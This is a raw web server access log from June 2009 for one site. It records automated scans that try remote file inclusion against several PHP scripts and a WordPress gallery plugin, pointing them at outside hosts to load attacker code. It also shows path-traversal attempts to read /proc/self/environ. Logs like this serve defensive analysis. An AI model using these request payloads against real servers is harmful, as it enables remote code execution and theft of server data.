64.40.150.211 - - [29/Jun/2009:23:11:42 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.40.150.211 - - [29/Jun/2009:23:11:42 -0700] "GET /phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.40.150.211 - - [29/Jun/2009:23:11:42 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:11:48 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:11:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:11:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [29/Jun/2009:23:17:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:34 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:34 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:34 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:47 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:47 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:19:47 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:28 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:28 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:28 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:41 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:41 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:41 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:45 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:45 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:20:45 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.40.150.211 - - [29/Jun/2009:23:21:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.40.150.211 - - [29/Jun/2009:23:21:39 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.40.150.211 - - [29/Jun/2009:23:21:40 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:21:41 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:21:41 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:21:41 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:25:07 -0700] "GET /phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:25:07 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.71.241.146 - - [29/Jun/2009:23:25:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:26:41 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:26:41 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:26:41 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:16 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:16 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:19 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:24 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:24 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:23:27:24 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /index.php?redir=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/index.php?redir=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/access.log/index.php?redir=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/access.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:20 -0700] "GET /logs/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.161.198.16 - - [29/Jun/2009:23:33:21 -0700] "GET /logs/access.log/index.php?redir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:41 -0700] "GET /logs/access.log/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:41 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:41 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:44 -0700] "GET /logs/access.log/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:44 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:34:44 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:35:12 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:35:12 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:35:12 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
66.163.171.205 - - [29/Jun/2009:23:36:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:02 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:02 -0700] "GET /logs/access.log/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:02 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:06 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:06 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:06 -0700] "GET /include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:09 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:09 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:38:09 -0700] "GET /logs/access.log/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:11 -0700] "GET /include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:11 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.172.131 - - [29/Jun/2009:23:38:11 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:35 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:35 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:35 -0700] "GET /logs/access.log%20%20/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:37 -0700] "GET /felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:37 -0700] "GET /logs/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:41:37 -0700] "GET /logs/access.log%20%20/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:42:03 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:42:03 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:42:03 -0700] "GET /include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:43:47 -0700] "GET /include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:43:47 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:43:47 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:45:01 -0700] "GET /logs/access_090112.log%20%20/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:23:45:17 -0700] "GET /logs/access_090112.log%20%20/felix/blog//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:45:51 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:45:51 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:45:51 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:05 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:05 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:05 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:20 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:20 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.98.209.71 - - [29/Jun/2009:23:46:20 -0700] "GET /logs//wp-content/plugi